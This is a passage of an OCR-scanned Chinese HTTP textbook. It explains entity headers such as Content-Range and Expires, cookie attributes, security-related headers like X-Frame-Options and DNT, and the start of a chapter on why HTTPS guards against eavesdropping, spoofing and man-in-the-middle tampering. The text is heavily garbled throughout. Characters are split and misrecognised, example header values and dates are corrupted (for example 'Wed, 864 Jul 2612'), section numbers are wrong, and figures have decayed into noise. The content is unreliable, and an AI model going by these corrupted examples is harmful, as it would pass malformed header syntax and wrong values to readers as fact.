大 Content-MD5 也 可 重新 计算 然后 被 自 改 。 所 以 处 在 接收 阶段 的 客户 
端 是 无 法 意识 到 报 文 主体 以 及 首部 字段 Content-MD5 是 已 经 被 算 改 过 
的 。 


6.0.7 Content-Range 





把 那些 部 分 发 送 给 我 










二 全 


全 部 10000 字 节 内 ， 先 
发 送 第 5s00I~i0000 字 节 
的 资源 吧 





HTTP/1.1 206 Partial Content 

Date: Wed, 04 Jul 2012 07:28:03 GMT 
Content-Range: bytes 5001-10000/10000 
Content-Length: 5000 

Content-Type: image/jpeg 


Content-Range: bytes 5661-16666/16666 


针对 范围 请 求 ， 返 回 啊 应 时 使 用 的 首部 字段 Content-Range， 能 告知 客 
户 端 作为 啊 应 返回 的 实体 的 哪个 部 分 符合 范围 请 求 。 字 段 值 以 字 节 为 
单位 ， 表 示 当 前 发 送 部 分 及 整个 实体 大 小 。 


0.0.8 ” Content-Type 
Content-Type: text/html; charset=UTF-8 
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首部 字段 Content-Type 说 明了 实体 主体 内 对 象 的 媒体 类 型 。 和 首部 字 
段 Accept 一 样 ， 字 段 值 用 type/subtype 形式 赋值 。 


参数 charset 使 用 iso-8859-1 或 euc-jp 等 字符 集 进行 赋值 。 


06.06.9 Expires 





该 资源 你 可 以 使 用 到 
2012 年 7 月 4 日 





缓存 服务 器 源 服务 器 


Expires: Wed, 864 Jul 2612 68:26:65 GMT 


首部 字段 Expires 会 将 资源 失效 的 日 期 告知 客户 端 。 绥 存 服务 喜 在 接 
收 到 含有 首部 字段 Expires 的 啊 应 后 ， 会 以 缓存 来 应 答 请 求 ， 在 
Expires 字段 值 指 定 的 时 间 之 前 ， 啊 应 的 副本 会 一 直 被 保存 。 当 超过 
绥 存 服务 器 在 请 求 发 送 过 来 时 ， 会 转 回 源 服务 器 请 求 
资源 。 


源 服 务 器 不 希望 缓存 服务 右 对 资源 缓存 时 ， 最 好 在 Expires 字段 内 写 
入 与 首部 字段 Date 相同 的 时 间 值 。 


但 是 ， 当 首部 字段 Cache-Control 有 指定 max-age 指令 时 ， 比 起 首部 字 
段 Expires， 会 优先 处 理 max-age 指令 。 

















0.0.10 Last-Modified 






该 资源 在 2012 年 月 23 日 被 修改 过 
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Last-Modified: Wed, 23 May 2612 69:59:55 GMT 


首部 字段 Last-Modified 指明 资源 最 终 修改 的 时 间 。 一 般 来 说 ， 这 个 
值 就 是 Request-URI 指定 资源 被 修改 的 时 间 。 但 类 似 使 用 CGI 脚本 进 
行动 态 数据 处 理 时 ， 该 值 有 可 能 会 变 成 数据 最 终 修改 时 的 时 间 。 


6.7 为 Cookie 服务 的 首部 字段 

管理 服务 器 与 客户 端 之 间 状 态 的 Cookie， 虽 然 没 有 被 编 入 标准 化 
HTTP/1.1 的 RFC2616 中 ， 但 在 Web 网 站 方面 得 到 了 广泛 的 应 用 。 
Cookie 的 工作 机 制 是 用 户 识 别 及 状态 管理 。Web 网 站 为 了 管理 用 户 的 
状态 会 通过 Web 浏览 器 ， 把 一 些 数据 临时 写 入 用 户 的 计算 机 内 。 接 


着 当 用 户 访问 该 Web 网 站 时 ， 可 通过 通信 方式 取 回 之 前 发 放 的 
Cookie。 

调用 Cookie 时 ， 由 于 可 校 验 Cookie 的 有 效 期 ， 以 及 发 送 方 的 域 、 路 
径 、 协 议 等 信息 ， 所 以 正规 发 布 的 Cookie 内 的 数据 不 会 因 来 自 其 他 
Web 站 点 和 攻击 者 的 攻击 而 泄露 。 

至 2013 年 5 月 ，Cookie 的 规格 标准 文档 有 以 下 4 种 。 

由 网 景 公司 颁布 的 规格 标准 

网 景 通信 公司 设计 并 开发 了 Cookie， 并 制定 相关 的 规格 标准 。1994 
年 前 后 ，Cookie 正式 应 用 在 网 景 浏览 器 中 。 目 前 最 为 普及 的 Cookie 
方式 也 是 以 此 为 基准 的 。 

RFC2109 

某 企业 尝试 以 独立 技术 对 Cookie 规格 进行 标准 化 统筹 。 原 本 的 意图 
是 想 和 网 景 公 司 制 定 的 标准 交互 应 用 ， 可 惜 发 生 了 微妙 的 差异 。 现 在 
该 标准 已 淡出 了 人 们 的 视线 。 


RFC296S 














为 终结 Internet Explorer 浏览 器 与 Netscape Navigator 的 标准 差异 而 导 
致 的 浏览 器 战争 ，RFC2965 内 定义 了 新 的 HTTP 首部 Set-Cookie2 和 
Cookie2。 可 事实 上 ， 它 们 几乎 没 怎么 投入 使 用 。 
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RFC626S 


将 网 景 公 司 制定 的 标准 作为 业界 事实 标准 (De facto standard) ， 重 新 
定义 Cookie 标准 后 的 产物 。 


目前 使 用 最 广泛 的 Cookie 标准 却 不 是 RFC 中 定义 的 任何 一 个 。 而 是 
在 网 景 公司 制定 的 标准 上 进行 扩展 后 的 产物 。 


本 贡 接 下 来 就 对 目前 使 用 最 为 广泛 普及 的 标准 进行 说 明 。 
下 面 的 表格 内 列举 了 与 Cookie 有 关 的 首部 字段 。 
表 6-8: 为 Cookie 服务 的 首部 字段 


开始 状态 管理 所 使 用 的 Cookie 信 息 “| 响应 首部 字段 


























服务 器 接收 到 的 Cookie 信 息 请 求 首部 字段 


Set-Cookie 首部 






你 拿 着 这 个 Cookie 


Cookie 3 


Cookie 首部 


0.7.1 Set-Cookie 





Set-Cookie: status=enable; expires=Tue, 85 Jul 2611 67:26:3 


当 服 务 器 准备 开始 管理 客户 端的 状态 时 ， 会 事先 告知 各 种 信息 。 





下 面 的 表格 列举 了 Set-Cookie 的 字段 值 。 


表 6-9: Set-Cookie 字段 的 属性 
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属 公 说 明 


赋予 Cookie 的 名 称 和 其 值 (必需 项 ) 


expires=DATE Cookie 的 有 效 期 ( 奉 不 明确 指定 则 默认 为 浏览 器 关闭 前 为 止 )》 


i 将 服务 器 上 的 文件 目录 作为 Cookie 的 适用 对 象 〈 若 不 指定 则 默 
p 认为 文档 所 在 的 文件 目录 
































domain= 域 名 作为 Cookie 适用 对 象 的 域名 ( 若 不 指定 则 默认 为 创建 Cookie 
的 服务 器 的 域名 ) 
仅 在 HTTPS 安全 通信 时 才 会 发 送 Cookie 
加 以 限制 ， 使 Cookie 不 能 被 JavaScript 脚本 访问 


expires 属性 
Cookie 的 expires 属性 指定 浏览 器 可 发 送 Cookie 的 有 效 期 。 


当 省 略 expires 属性 时 ， 其 有 效 期 仪 限于 维持 浏览 器 会 话 (Session) 
时 间 段 内 。 这 通常 限于 浏览 器 应 用 程序 被 关闭 之 前 。 


另外 ， 一 旦 Cookie 从 服务 器 端 发 送 至 客户 端 ， 服 务 器 端 就 不 存在 可 
以 显 式 删除 Cookie 的 方法 。 但 可 通过 和 窗 新 已 过 期 的 Cookie， 实 现 对 
客户 端 Cookie 的 实质 性 删除 操作 。 


path 属性 

Cookie 的 path 属性 可 用 于 限制 指定 Cookie 的 发 送 范 围 的 文件 目录 。 

不 过 男 有 办 法 可 避 开 这 项 限制 ， 看 来 对 其 作为 安全 机 制 的 效果 不 能 抱 
有 期 待 。 

domain 属性 

通过 Cookie 的 domain 属性 指定 的 域名 可 做 到 与 结尾 匹配 一 致 。 比 
如 ， 当 指定 example.com 后 ， 除 example.com 以 外 ，www.example.com 
或 www2.example.com 等 都 可 以 发 送 Cookie。 


因此 ， 除 了 针对 具体 指定 的 多 个 域名 发 送 Cookie 之 外 ， 不 指定 
domain 属性 显得 更 安全 。 








secure 属性 


Cookie 的 secure 属性 用 于 限制 Web 页 面 仅 在 HTTPS 安全 连接 时 ， 才 
可 以 发 送 Cookie。 
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发 送 Cookie 时 ， 指 定 secure 属性 的 方法 如 下 所 示 。 


Set-Cookie: name=value; secure 


以 上 例子 仅 当 在 https:/www.example.com/ “HTTPS) 安全 连接 的 情况 
下 才 会 进行 Cookie 的 回收 。 也 就 是 说 ， 即 使 域名 相同 ， 
http://www.example.com/ 〈HTTP) 也 不 会 发 生 Cookie 回收 行为 。 


当 省 略 secure 属性 时 ， 不 论 HTTP 还 是 HTTPS， 都 会 对 Cookie 进行 
回收 。 


HttpOnly 属性 


Cookie 的 HttpOnly 属性 是 Cookie 的 扩展 功能 ， 它 使 JavaScript 脚本 
无 法 获得 Cookie。 其 主要 目的 为 防止 跨 站 脚本 攻击 (Cross-site 
Scripting，XSS) 对 Cookie 的 信息 鳃 取 。 


发 送 指定 HttpOnly 属性 的 Cookie 的 方法 如 下 所 示 。 


Set-Cookie: name=value; HttpOnly 


通过 上 述 设置 ， 通 常 从 Web 页 面 内 还 可 以 对 Cookie 进行 读 取 操作 。 
但 使 用 JavaScript 的 document.cookie 就 无 法 读 取 附加 HttpOnly 属性 后 
的 Cookie 的 内 容 了 。 因 此 ， 也 就 无 法 在 XSS 中 利用 JavaScript 劫持 
Cookie 了 。 


虽然 是 独立 的 扩展 功能 ， 但 Internet Explorer 6 SP1 以 上 版 本 等 当下 的 
主流 浏览 器 都 已 经 文 持 该 扩展 了 。 另 外 顺带 一 提 ， 该 扩展 并 非 是 为 了 
防止 XSS 而 开发 的 。 











0.7.2 Cookie 


Cookie: status=enable 


首部 字段 Cookie 会 告知 服务 器 ， 当 客户 端 想 获得 HTTP 状态 管理 文 
持 时 ， 就 会 在 请 求 中 包含 从 服务 器 接收 到 的 Cookie。 接 收 到 多 个 
Cookie 时 ， 同 样 可 以 以 多 个 Cookie 形式 发 送 。 


6.8 其 他 首部 字段 
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HTTP 首部 字段 是 可 以 自行 扩展 的 。 所 以 在 Web 服务 器 和 浏览 器 的 应 
用 上 ， 会 出 现 各 种 非 标准 的 首部 字段 。 


接 下 来 ， 我 们 就 一 些 最 为 第 用 的 首部 字段 进行 说 明 。 
。 X-Frame-Options 
e X-XSS-Protection 
。 DNT 


e P3P 


0.8.1 X-Frame-Options 


首部 字段 X-Frame-Options 属于 HITP 啊 应 首部 ， 用 于 控制 网 站 内 容 
在 其 他 Web 网 站 的 Frame 标签 内 的 显示 问题 。 其 主要 目的 是 为 了 防 
止 点 击 动 持 (clickjacking〉 攻 击 。 

首部 字段 X-Frame-Options 有 以 下 两 个 可 指定 的 字段 值 。 


e。DENY : 拒绝 














。 SAMEORIGIN : 仅 同 源 域名 下 的 页 面 〈Top-level-browsing- 

context) 匹配 时 许可 。《〈 比 如， 当 指 定 http://hackr.jp/sample.html 

页 面 为 SAMEORIGIN 时 ， 那 么 hackrjp 上 所 有 页 面 的 frame 都 被 

人 而 example.com 等 其 他 域名 的 页 面 就 不 行 

) 

支持 该 首部 字段 的 浏览 器 有 : Internet Explorer 8、Firefox 3.6.9+、 
Chrome 4.1.249.1042+、Safari 4+ 和 Opera 10.50+ 等 。 现 在 主流 的 浏览 
器 都 已 经 支持 。 


能 在 所 有 的 Web 服务 需 端 预先 设 定好 X-Frame-Options 字段 值 是 最 理 
想 的 状态 。 


对 apache2.conf 的 配置 实例 


<IfModule mod headers .cy> 
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Header append X-FRAME-OPTIONS "SAMEORIGIN 
</IfModule> 


6.8.2 X-XSS-Protection 


X-XSS-Protection: 1 


首部 字段 X-XSS-Protection 属于 HTTP 响应 首部 ， 它 是 针对 跨 站 脚本 
攻击 (XSS) 的 一 种 对 策 ， 用 于 控制 浏览 器 XSS 防护 机 制 的 开关 。 


首部 字段 X-XSS-Protection 可 指定 的 字段 值 如 下 。 
0 : 将 XSS 过 滤 设 置 成 无 效 状 态 
1 : 将 XSS 过 滤 设 置 成 有 效 状 态 





6.8.3 DNT 


我 不 会 杷 我 的 信 
息 交 给 你 的 ! 





DNT 首部 


DNT: 1 


首部 字段 DNT 属于 HTTP 请 求 首 部 ， 其 中 DNT 是 Do Not Track 的 简 
意 为 拒绝 个 人 信息 被 收集 ， 是 表示 拒绝 被 精准 广告 追踪 的 一 种 方 
法 。 
首部 字段 DNT 可 指定 的 字段 值 如 下 。 

0 : 同意 被 追踪 

1 : 拒绝 被 追踪 


由 于 首部 字段 DNT 的 功能 具备 有 效 性 ， 所 以 Web 服务 器 需要 对 DNT 
做 对 应 的 支持 。 


0.8.4 了 3P 


P3P: CP="CAO DSP LAW CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa 


首部 字段 P3P 属于 HITP 相应 首部 ， 通 过 利用 P3P (The Platform for 
Privacy Preferences， 在 线 隐私 偏好 平台 〉 技术 ， 可 以 让 Web 网 站 上 
0 0 以 达到 保护 用 户 隐 私 的 
目的 。 

要 进行 P3P 的 设 定 ， 需 按 以 下 操作 步骤 进行 。 

又 1: 创建 P3P 隐私 

又 2: 创建 P3P 隐私 对 照 文 件 后 ， 保 存 命名 在 /w3c/p3p.xml 


又 3: 从 P3P 隐私 中 新 建 Compact policies 后 ， 输 出 到 HTTP 响应 


RN 


hh 


有 关 P3P 的 详细 规范 标准 请 参看 下 方 链接 。 

。 The Platform for Privacy Preferences 1.0 (P3P1.0) Specification 
http: /www.w3.o0org/ TR/P3P/ 

协议 中 对 X- 前 级 的 废除 
在 HITP 等 多 种 协议 中 ， 通 过 给 非 标准 参数 加 上 前 级 X-， 来 区 别 
于 标准 参数 ， 并 使 那些 非 标准 的 参数 作为 扩展 变 成 可 能 。 但 是 这 种 
简单 粗暴 的 做 法 有 百 害 而 无 一 益 ， 因 此 在 “RFC 6648 - Deprecating 
the "X-" Prefix and Similar Constructs in Application Protocols” 中 提议 
停止 该 做 法 。 
然而 ， 对 已 经 在 使 用 中 的 X- 前 级 来 说 ， 不 应 该 要 求 其 变更 。 
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第 7 章 确保 Web 安全 的 
HTTPS 
在 HITP 协议 中 有 可 能 存在 信息 因 听 或 身份 伪装 等 安全 问题 。 使 用 


HTTPS 通信 机 制 可 以 有 效 地 防止 这 些 问题 。 本 章 我 们 就 了 解 一 下 
HTTPS。 








7.1 HTTP 的 缺点 


到 现在 为 止 ， 我 们 已 了 解 到 HITP 具有 相当 优秀 和 方便 的 一 面 ， 然 而 
HTTP 并 非 只 有 好 的 一 面 ， 事 物 篆 具 两 面 性 ， 它 也 是 有 不 足 之 处 的 。 


HTTP 主要 有 这 些 不 足 ， 例 举 如 下 。 

。 通 信使 用 明文 〈 不 加 密 ) ， 内 容 可 能 会 被 窃听 
。 不 验证 通信 方 的 身份 ， 因 此 有 可 能 遭遇 伪装 
。 无 法 证 明报 文 的 完整 性 ， 所 以 有 可 能 已 遭 自 改 
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这 些 问题 不 仅 在 HITP 上 出 现 ， 其 他 未 加 密 的 协议 中 也 会 存在 这 类 问 
题 。 








除 此 之 外 ，HTTP 本 里 还 有 很 多 缺点 。 而 且 ， 还 有 像 某 些 特定 的 Web 
服务 器 和 特定 的 Web 浏览 器 在 实际 应 用 中 存在 的 不 足 〈 也 可 以 说 成 
古 脆弱 性 或 安全 汤 洞 )， 男 外 ， 用 Java 和 PHP 等 编程 语言 开发 的 

Web 应 用 也 可 能 存在 安全 漏洞 。 


7.1.1 通信 使 用 明文 可 能 会 被 禄 听 
由 于 HTTP 本 身 不 具备 加 密 的 功能 ， 所 以 也 无 法 做 到 对 通信 整体 〈 使 
用 HTTP 协议 通信 的 请 求 和 啊 应 的 内 容 ) 进行 加 密 。 即 ，HTTP 报 文 
使 用 明文 〈 指 未 经 过 加 密 的 报 文 ) 方式 发 送 。 

。TCP/IP 是 可 能 被 田 听 的 网 络 

如 果 要 问 为 什么 通信 时 不 加 密 是 一 个 缺点 ， 这 是 因为 ， 按 


TCP/ 了 下 协议 族 的 工作 机 制 ， 通 信和 内 容 在 所 有 的 通信 线路 上 都 有 
可 能 遭 到 顷 视 。 








所 谓 互联 网 ， 是 由 能 连通 到 全 世界 的 网 络 组 成 的 。 无 论 世 界 哪个 
角落 的 服务 器 在 和 客户 站 通信 时 ， 在 此 通信 线路 上 的 某 些 网 络 设 
备 、 光 统 、 计 算 机 等 都 不 可 能 是 个 人 的 私有 物 ， 所 以 不 排除 某 个 
环 市 中 会 遭 到 恶意 筑 视 行为 。 

即使 已 经 过 加 密 处 理 的 通信 ， 也 会 被 颖 视 到 通信 内 容 ， 这 点 和 未 
加 和 密 的 通信 是 相同 的 。 只 是 说 如 有 果 通 信和 经 过 加 密 ， 就 有 可 能 让 人 
0 
被 看 到 的 。 


A 
Ozd > 











-uno=7/ 7 Zn 是 OO 


和 
相同 LAN 内 的 9 


其 他 客户 站 
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图 : 互联 网 上 的 任何 角落 都 存在 通信 内 容 被 锣 听 的 风险 


筋 听 相同 段 上 的 通信 并 非 难事 。 只 需要 收集 在 互联 网 上 流动 的 数 
据 包 ( 帧 ) 就 行 了 。 对 于 收集 来 的 数据 包 的 解析 工作 ， 可 交 给 那 
些 抓 包 〈Packet Capture) 或 咒 探 器 (Sniffer) 工具 。 


下 面 的 图 片 示例 束 是 被 广泛 使 用 的 抓 包 工具 Wireshark。 它 可 以 
获取 HTTP 协议 的 请 求 和 啊 应 的 内 容 ， 并 对 其 进行 解析 。 


像 使 用 GET 方法 发 送 请 求 、 响 应 返回 了 200 OK， 查 看 HTTP 响 
应 报 文 的 全 部 内 容 等 一 系列 的 事情 都 可 以 做 到 。 


而 Atheros AR813x/ARB15x PCI-E Ethernet Controller [Wireshark 1.6.8 (SVN Rev 42761 from /trunk-1.6)P a 
| Be Edt Vew Go Capture Anayze Statistcs Telephony Tooks Intemas Hep 
1XSSlAae9o9Fl 国 国 /QQQDl 四 转交 | 加 


Filter: | tcp.stream eq 3 

















18 2. 566264 203.189.105.112 192.168.3.101 


29 2.573205 203.189.105.112 192.168.3.101 60 http > 58330 [ACK] Seq=l Ack=345 Win=6912 Len=0 
30 2.584874 203.189.105.112 192.168. 3.101 650 HTTP/1.1 200 OK et) 
31 2.584929 “203.189.105.112 192.168.3.101 60 http > 58330 [FIN, ACK] Seq=597 Ack=345 Win=691 


了 -了 到 6a:b6 E 
田 Internet prorocol Version 4, Src: 203. 189. 105.112 C203. 189. 105. 112), Dst: 192. 168. 3 101 Ge; 68, a ee 
© Control Proroco1， Src Port: htrp (80), Dst Port: 58330 (58330), Seq: 1, 


图 
Date: Fri, 13 ]u1 2012 02:45:26 @MT\r\n 
Server: Apache\r\n 
Last-Modified: Fri, 31 Aug 2007 02:02:20 @T\r\n 
ETag: "45bael-16a-46d776ac"\r\n 
Accept-Ranges: bytes\r\n 
田 Content-Length: 362\r\n 
Connection: close\r\n 
Content-Type: text/html\r\n 


\rn 
® Line-based text data: Eo/ 


EO el 0 
bz 7c 38 24 40 00 35 06 














站 Dt -Ra 
| 图 | Frame (fame), 650 bytes Packets: 84 Dpbyed: 10 Marked: 0 Dropped: 0 


图 : Wireshark (http://www.wireshark.org/) 
。 加 密 处 理 防止 被 镭 听 


在 目前 大 家 正在 研究 的 如 何 防止 窃听 保护 信息 的 几 种 对 策 中 ， 最 
为 普及 的 就 是 加 密 技 术 。 加 密 的 对 象 可 以 有 这 么 几 个 。 


通信 的 加 密 
一 种 方式 就 是 将 通信 加 密 。HTTP 协议 中 没有 加 密 机 制 ， 但 可 以 
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通过 和 SSL (Secure Socket Layer， 安 全 套 接 层 ) 或 
TLS (Transport Layer Security， 安 全 层 传输 协议 ) 的 组 合 使 用 ， 
加 密 HTTP 的 通信 内 容 。 


用 SSL 建立 安全 通信 线路 之 后 ， 就 可 以 在 这 条 线路 上 进行 HITP 
通信 了 。 与 SSL 组 合 使 用 的 HITP 被 称 为 HTTPS (HTTP 
Secure， 超 文本 传输 安全 协议 ) 或 HITP over SSL。 





客户 端 服务 器 


服务 器 与 客户 端 之 间 建 立 起 安全 的 通信 线路 之 后 开始 通信 





内 容 的 加 密 

还 有 一 种 将 参与 通信 的 内 容 本 身 加 密 的 方式 。 由 于 HTTP 协议 中 
没有 加 密 机 制 ， 那 么 就 对 HTTP 协议 传输 的 内 容 本 身 加 密 。 即 把 
HTTP 报 文 里 所 含 的 内 容 进 行 加 密 处 理 。 


在 这 种 情况 下 ， 客 户 端 需要 对 HTTP 报 文 进行 加 密 处 理 后 再 发 送 


请 求 。 
报 文 首 部 








这 里 未 被 加 密 
处 理 













这 里 面 的 内 容 会 被 加 密 处 理 ( 通信 本 
身 是 不 加 密 的 ) 








减 袋 ， 为 了 做 到 有 效 的 内 容 加 密 ， 前 提 是 要 求 客户 端 和 服务 器 同 
时 具备 加 密 和 解密 机 制 。 主 要 应 用 在 Web 服务 中 。 有 一 点 必须 
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引起 注意 ， 由 于 该 方式 不 同 于 SSL 或 TLS 将 整个 通信 线路 加 密 
处 理 ， 所 以 内 容 仍 有 被 和 修改 的 风险 。 稍 后 我 们 会 加 以 说 明 。 


7.1.2 ”不 验证 通信 方 的 号 份 台 可 能 遭 遇 伪 装 


HTTP 协议 中 的 请 求 和 啊 应 不 会 对 通信 方 进行 确认 。 也 就 是 说 存在 “ 服 
务 器 是 否 就 是 发 送 请 求 中 URI 真正 指定 的 主机 ， 返 回 的 啊 应 是 否 真 的 
返回 到 实际 提出 请 求 的 客户 并 ”等 类 似 问题 。 
。 任 何人 都 可 发 起 请 求 
在 HITP 协议 通信 时 ， 由 于 不 存在 确认 通信 方 的 处 理 步 又， 任何 
人 都 可 以 发 起 请 求 。 另 外 ， 服 务 器 只 要 接收 到 请 求 ， 不 管 对 方 是 
谁 都 会 返回 一 个 啊 应 但 也 仪 限 于 发 送 端 的 中 地 址 和 端口 写 没 
有 被 Web 服务 器 设 定 限制 访问 的 前 提 下 》。 


不 管 你 人 门 是 谁 我 
都 会 接 骂 曲 









服务 器 
对 请 求 来 者 不 拒 











HTTP 协议 的 实现 本 里 非 第 简单 ， 不 论 是 谁 友 送 过 来 的 请 求 都 会 
返回 啊 应 ， 因 此 不 确认 通信 方 ， 会 存在 以 下 各 种 隐患 。 
o 无 法 确定 请 求 及 送 全 目标 的 Web 服务 器 是 否 是 按 真 实意 
图 返回 啊 应 的 那 台 服务 器 。 有 可 能 是 已 伪装 的 Web 服务 
器 。 
o 无 法 确定 啊 应 返回 到 的 客户 站 是 否 是 按 真 实意 图 接收 啊 
应 的 那个 客户 端 。 有 可 能 是 已 伪装 的 客户 端 。 
o 无 法 确定 正在 通信 的 对 方 是 否 具备 访问 权限 。 因 为 茶 些 
Web 服务 器 上 保存 着 重要 的 信息 ， 只 想必 给 特定 用 户 通 
信 的 权限 。 
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o 无 法 判定 请 求 是 来 自 何方 、 出 目 谁 手 。 


o 即使 是 无 意义 的 请 求 也 会 照 单 全 收 。 无 法 阻止 海量 请 求 
下 的 DoS 攻击 (Denial of Service， 拒 绝 服务 攻击 ) 。 


。 碍 明 对 手 的 证 书 


虽然 使 用 HTTP 协议 无 法 确定 通信 方 ， 但 如 果 使 用 SSL 则 可 以 。 
SSL 不 仅 提供 加 密 处 理 ， 而 且 还 使 用 了 一 种 被 称 为 证 书 的 手段 ， 
可 用 于 确定 方 。 


证 书 由 值得 信任 的 第 三 方 机 构 颁 发 ， 用 以 证 明 服务 顺和 客户 端 是 
实际 存在 的 。 必 外 ， 伪 造 证 书 从 技术 角度 来 说 是 异常 困难 的 一 件 
事 。 所 以 只 要 能 够 确认 通信 方 〈 服 务 器 或 客户 端 ) 持 有 的 证 书 ， 
即 可 判断 通信 方 的 真实 意图 。 








OOO 


> 








端 通信 之 前 先 确 i 我 已 确认 ， 这 合 服务 器 
el 的 确 是 人 公司 的 Web 网 
| 站 服务 
Wy 站 服务 器 
: < le | ar 


| 
证 书 DDO 


值得 信赖 的 
第 三 方 








A 公 司 的 
Web 网 站 服务 器 







喝 ， 看 来 我 准备 访问 地 
就 是 A 公司 的 Web 同 站 
的 服务 器 





通过 使 用 证 书 ， 以 证 明 通 信 方 就 是 意料 中 的 服务 硕 。 这 对 使 用 者 
个 人 来 讲 ， 也 减少 了 个 人 信息 泄露 的 危险 性 。 


另外 ， 客 户 端 持 有 证 书 即 可 完成 个 人 刁 份 的 确认 ， 也 可 用 于 对 
Web 网 站 的 认证 环节 。 


7.1.3 ”无 法 证 明报 文 完整 性 ， 可 能 已 遭 修改 
所 谓 完整 性 是 指 信息 的 准确 度 。 知 无 法 证 明 其 完整 性 ， 通 币 也 就 意味 
着 无 法 判断 信息 是 人 否 准确 。 
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。 接收 到 的 内 容 可 能 有 误 


由 于 HITP 协议 无 法 证 明 通 信 的 报 文 完整 性 ， 因 此 ， 在 请 求 或 啊 
应 送出 之 后 直到 对 方 接收 之 前 的 这 段 时 间 内 ， 即 使 请 求 或 啊 应 的 
内 容 章 到 修改 ， 也 没有 办 法 获悉 。 


换 句 话说 ,没有 任何 办 法 确认 ， 友 出 的 请 求 / 啊 应 和 接收 到 的 请 
求 / 啊 应 是 前 后 相同 的 。 


中 途 可 能 被 自 改 
| > 
人 ss A 
无 法 判断 A 和 B 是 相同 的 


比如 ， 从 某 个 Web 网 站 上 下 载 内 容 ， 是 无 法 确定 客户 端 下 载 的 
文件 和 服务 器 上 存放 的 文件 是 否 前 后 一 致 的 。 文 件 内 容 在 传输 途 
中 可 能 已 经 被 算 改 为 其 他 的 内 容 。 即 使 内 容 真 的 已 改变 ， 作 为 接 
收 方 的 客户 端 也 是 觉察 不 到 的 。 


像 这 样 ， 请 求 或 啊 应 在 传输 途中 ， 遭 攻击 者 拦截 并 和 贷 改 内 容 的 攻 
击 称 为 中 间 人 攻击 (Man-in-the-Middle attack，MITM) 。 




















原本 想 在 服务 器 与 客户 端 之 间 进 行 通信 ……: 





之 攻 二 雹 


客户 端 攻击 者 











攻击 人 会 随意 自 改 请 求 和 响应 ， 而 让 客户 端 与 服务 器 之 间 的 
通信 看 上 去 仍旧 是 正常 的 。 
图 : 中 间 人 攻击 


。 如 何 防 止 自 改 
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虽然 有 使 用 HTTP 协议 确定 报 文 完整 性 的 方法 ， 但 事实 上 并 不 便 
捷 、 可 靠 。 其 中 常用 的 是 MD5 和 SHA-1 等 散 列 值 校 验 的 方法 ， 
以 及 用 来 确认 文件 的 数字 签名 方法 。 


Apache HTTP Server 2.4.2 (httpd): 2.4.2 is the latest available version 





The Apache HTTP Server Project is pleased to announce the release of version 2.4.2 of the Apache HTTP 
Server ("Apache" and "httpd"). This version of Apache is our 2nd GA release of the new generation 2.4.x 
branch of Apache HTTPD and represents fifteen years of innovation by the project and is recommended 
over all previous releases! 





For details see the Official Announcement and the CHANGES 2.4 and CHANGES 2.42 lists 








。Unix Source: httpd-2.4.2tarbz2 [PGP ] [ MD5 ] [ SHA1 ] 





。 Unix Source: httpd-2.4.2targz [PGP ][ MD5 ][ SHA1] 





。 Security and official patches 





Download - The Apache HTTP Server Project 


p 1 
“Qtherfles http://httpd.apache.org/ download.cgi 





提供 文件 下 载 服务 的 Web 网 站 也 会 提供 相应 的 以 PGP (Pretty 

Good Privacy， 完 美 隐私 ) 创建 的 数字 签名 及 MD5 算法 生成 的 散 
列 值 。PGP 是 用 来 证 明 创建 文件 的 数字 签名 ，MD5 是 由 单 同 函 
数 生成 的 散 列 值 。 不 论 使 用 哪 一 种 方法 ， 都 需要 操纵 客户 端的 用 
户 本 人 杀 上 自 检 查验 证 下 载 的 文件 是 否 就 是 原来 服务 器 上 的 文件 。 
浏览 器 无 法 自动 帮 用 户 检 查 。 


可 惜 的 是 ， 用 这 些 方法 也 依然 无 法 百 分 百 保 证 确认 结果 正确 。 因 
为 PGP 和 MD5 本 里 被 改写 的 话 ， 用 户 是 没有 办 法 意识 到 的 。 


为 了 有 效 防止 这 些 浆 端 ， 有 必要 使 用 HTTPS。SSL 提供 认证 和 加 
密 处 理 及 摘要 功能 。 仅 靠 HTTP 确保 完整 性 是 非常 困难 的 ， 因 此 
通过 和 其 他 协议 组 合 使 用 来 实现 这 个 目标 。 下 节 我 们 介绍 
HTTPS 的 相关 内 容 。 














7.2 HTTP+ 加 密 + 认证 + 完整 性 保护 
=HTTPS 


7.2.1 HTTP 加 上 加 密 处 理 和 认证 以 及 完整 性 保护 后 即 是 
HTTPS 


如 果 在 HTTP 协议 通信 过 程 中 使 用 未 经 加 密 的 明文 ， 比 如 在 Web 页 
面 中 输入 信用 卡号 ， 如 果 这 条 通信 线路 遭 到 窃听 ， 那 么 信用 卡号 就 暴 
露 了 。 


另外 ， 对 于 HITP 来 说， 服务 需 也 好 ， 客 户 问 也 好 ， 都 是 没有 办 法 确 
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认 通 信 方 的 。 因 为 很 有 可 能 并 不 是 和 原本 预想 的 通信 方 在 实际 通信 。 
并 且 还 需要 考虑 到 接收 到 的 报 文 在 通信 途中 已经 遭 到 复 改 这 一 可 能 
人 


为 了 统一 解决 上 述 这 些 问题 ， 需 要 在 HITP 上 再 加 入 加 密 处 理 和 认证 
等 机 制 。 我 们 把 添加 了 加 密 及 认证 机 制 的 HTTP 称 为 HTTPS (HTTP 


Secure) 。 


HTTP+ 通信 加 密 + 证 书 + 完整 性 保护 一》 $4 





证 书 可 证 明 服 务 器 或 客户 端的 身份 


证 rr 
图 : 使 用 HTTPS 通信 
经 常会 在 Web 的 登录 页 面 和 购物 结算 界面 等 使 用 HTTPS 通信 。 使 用 
HTTPS 通信 时 ， 不 再 用 http://， 而 是 改 用 https://。 男 外 ， 当 浏览 器 访 


问 HTTPS 通信 有 效 的 Web 网 站 时 ， 浏 览 器 的 地 址 栏 内 会 出 现 一 个 带 
锁 的 标记 。 对 HTTPS 的 显示 方式 会 因 浏览 器 的 不 同 而 有 所 改变 。 
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人 加 https://twitter.com 
一 


小 | twitter.com 
回 此 网 站 的 身份 已 经 过 Verisign Class 3 
Extended Validation SSL CA 验证 。 
证 书信 息 








与 twitter.com 的 连接 采用 128 位 加 密 
回 款 . 


该 连接 使 用 TLS 1.0。 


该 连接 是 使 用 RC4_128 进行 加 密 的 ， 
同时 使 用 SHA1 进行 讯息 身份 验证 并 
ECDHE_RSA 作为 密 钥 交换 机 





该 连接 未 进行 压缩 处 理 。 





— | Twitter. 


a RE 和 SA 引 
interests, and be in the know. 





7.2.2 HTTPS 是 身 拔 SSL 外 壳 的 HTTP 


HTTPS 并 非 是 应 用 层 的 一 种 新 协议 。 只 是 HTTP 通信 接口 部 分 用 
